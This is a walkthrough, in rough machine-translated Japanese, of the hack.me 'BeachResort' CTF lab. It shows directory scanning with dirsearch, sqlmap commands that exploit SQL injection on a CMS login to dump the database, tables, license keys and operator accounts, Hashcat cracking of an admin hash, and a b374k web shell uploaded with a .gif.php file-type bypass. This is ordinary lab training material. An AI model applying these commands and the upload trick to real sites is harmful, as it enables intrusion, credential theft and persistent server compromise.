
良い日、今日はVulnHub 'aではありません。 今日、 hack.meの代替案を検討してください。 さまざまなトピックをハッキングするための興味深いサイトが多数あります。 この記事ではBeachResortについて説明します。 著者によると、これは典型的なCTFではなく、 ここではフラグの代わりに、サイトのCMSのセキュリティを確認するよう求められますが、同時に次のことも確認してください。
- サイト管理者名
- DB名
- テーブル一覧
- CMSのルートディレクトリ内のすべてのファイルを一覧表示する
- ライセンスキー
- 非常に秘密のファイルの内容
さあ始めましょう
開始後、脆弱なサイトへの一時リンクが利用可能になります。 サイトをさまよう後、その上で何も面白いものを見つけられないので、隠しディレクトリのスキャンに移りましょう:
$ sudo dirsearch -u 'http://s60229-102657-xpo.croto.hack.me' -e php,txt,html -w /usr/share/dirb/wordlists/big.txt -x 503,403 --random-agent

さらにスキャン:
$ sudo dirsearch -u 'http://s60229-102657-xpo.croto.hack.me/cmsadm' -e php,txt,html -w /usr/share/dirb/wordlists/big.txt -x 503,403 --random-agent

予想どおり、承認フォームがあります:

また、データベースとそのコンテンツに関する情報を見つける必要があるため、おそらくSQLインジェクションを扱っています 。 彼女を見つけることは残っています:
$ sudo sqlmap -u 'http://s60229-102657-xpo.croto.hack.me/cmsadm/login.php' --data='user=admin&pass=admin' -p user --dbms=MySQL --random-agent --batch --dbs
Sqlmapはタスクを正常に処理し、データベースの名前を発行しました: supercmsおよびそのようなペイロード :
ペイロード: user = admin 'UNION ALL SELECT CONCAT(0x7176707a71,0x6964745475644f6f614968737948504a5a484b496a4f476355556b4172726d4f56766d6d53755276,0x71766a6b71)-OFdY&pass
テーブルのリストに移動します。
$ sudo sqlmap -u 'http://s60229-102657-xpo.croto.hack.me/cmsadm/login.php' --data='user=admin&pass=admin' -p user --dbms=MySQL --random-agent --batch -D supercms --tables

グループテーブルは私たちにとって興味深いものではありません、タスクはライセンスキーについて何かを言いました。 対応するテーブルを見てみましょう:
$ sudo sqlmap -u 'http://s60229-102657-xpo.croto.hack.me/cmsadm/login.php' --data='user=admin&pass=admin' -p user --dbms=MySQL --random-agent --batch -D supercms -T license --dump

別の1ポイントが完了しました。ユーザーのリストを確認する必要があります。同時に、おそらくCMS管理者名が必要です。
$ sudo sqlmap -u 'http://s60229-102657-xpo.croto.hack.me/cmsadm/login.php' --data='user=admin&pass=admin' -p user --dbms=MySQL --random-agent --batch -D supercms -T operators --dump

管理者が見つかり、 sqlmapでほとんどのパスワードが解読されました。最後のパスワードを見つけるには、 Hashcatを使用します 。
$ sudo /opt/cudaHashcat/cudaHashcat32.bin -m 0 hashes /media/DATA/passwords/hashkiller-dict.txt
そして、数秒後に必要なパスワードを取得します。
2bfea2ff114ccd30d95e176a1d25346a :!スーパー管理者!
ログインしてこのページにアクセスしようとします。

一般的に、画像をアップロードする機能を備えたページを除いて、興味深いものはありません。

単純なシェルをロードしようとすると、エラーが発生します。

Firefoxの タンパーデータプラグインでリクエストを処理した後、そこにb374kを入力します。 必要なのは、インターセプトされたリクエストのファイル名をb374k.gif.phpに置き換え 、 GIF89aの署名をファイルの先頭に追加することです。

リクエストを送信し、ダウンロードの成功に関するメッセージを受信します。 論理的に、「シェルピクチャ」がimagesディレクトリにロードされると仮定して、ダウンロードしたファイルを開いてみてください。

最後のタスクの実行を開始しましょう。つまり、ファイルとディレクトリのリストを取得します。

ここで、最後のリンクであるsecret.noopファイルを見つけます。

すべてのタスクが完了したら、作成者に安全に回答を送信して、通過を確認できます。